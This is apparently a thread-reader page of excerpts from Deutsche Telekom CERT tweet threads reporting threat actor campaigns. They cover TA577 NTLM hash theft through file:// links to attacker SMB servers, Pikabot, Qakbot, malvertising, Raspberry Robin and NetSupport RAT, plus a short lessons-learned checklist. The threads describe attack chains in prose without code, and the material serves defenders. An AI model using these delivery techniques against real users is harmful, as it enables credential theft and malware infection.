Technical tweets for technical folks by Deutsche Telekom CERT, CTI, and DFIR.
#dfir #cyber #cert #cti #TelekomSecurity
Feb 28 • 7 tweets • 2 min read
🚨 On February 26th and 27th Telekom Security and Bayern-CERT observed threat actor #TA577 phishing campaigns. This time the actor is not spreading malware, but apparently uses NTLMv2 handshakes to steal user credentials/hashes. 🧵1/7
Victims received a zipped HTML document that would relay them to the attacker SMB server via the contained "file://..." link. ⚠️ Please note that if such a file is opened in Edge or Chrome, the browser connects to the attacker server without prompting for confirmation! 🧵2/7
Feb 16 • 4 tweets • 2 min read
⚠️ This week, threat actor #TA577 introduced a rather interesting new approach to distribute their #Pikabot malware. Victim users received an #Excel spreadsheet prompting them to click on the contained button to view "files from the cloud". 🧵1/4
Further inspection of the file reveals that the document contains a hyperlink 🔗 to a remote SMB share, which hosts a Javascript file that triggers the Pikabot infection chain. 🧵2/4
Mar 24, 2023 • 6 tweets • 3 min read
#Qakbot threat actors are on fire 🔥 recently. We observed a high volume of attacks both internally and through external sources. Here is a brief summary of their current attack chain. 🧵1/6
Qakbot's main initial access vector is still through malspam campaigns ✉️. They use email thread hijacking for their spam messages to increase the likelihood that the victim user will interact on the message. 🧵2/6
Jan 20, 2023 • 7 tweets • 3 min read
⚠️ WARNING: There is currently a high volume of so-called #Malvertising attacks. Threat actors are placing ads in search engines like Google to to distribute their malware payloads. 🧵1/7
Their fraudulent web pages mimic the look of legitimate download pages for common software products. For example, here is a search advertisement and the corresponding fake website pretending to offer the software GIMP. 🧵2/7
Nov 18, 2022 • 6 tweets • 3 min read
#Qakbot once again had some surprises 🎁 for us this week. See below for a brief overview of what we found. 🧵 1/6
First and foremost, #Qakbot seems to have departed from their usual use of LNK files to trigger execution. Instead they now present .vbs or .js files at the root folder of the disk image 💿. 🧵 2/6
Sep 2, 2022 • 12 tweets • 5 min read
Raspberry Robin is a malware that has been around for some time now and spreads via infected USB drives.
Here is what we have seen over the last 10 months. 🧵 1/12 #RaspberryRobin#malware
via @lazy_daemon@sekoia_io and @redcanary have already published excellent technical analyses of this malware, so we won't go into more detail about it.
🚨CAUTION🚨 : Attackers send invoice themed emails impersonating german companies to deliver #NetSupport#RAT. 🐀 via @lazy_daemon 🧵1/5
Attached to the email is a HTML file which tries to download and execute malicious Javascript code. 🧵2/5
May 6, 2022 • 10 tweets • 3 min read
Here are some lessons learned from our past engagements; see it as an easy checklist on what not to do. #LessonsLearned ✅
1) MFA (Multi-Factor-Authentication) being not fully implemented or non-existent at all
While some attackers steal MFA tokens, it is rare! 📱 #MFA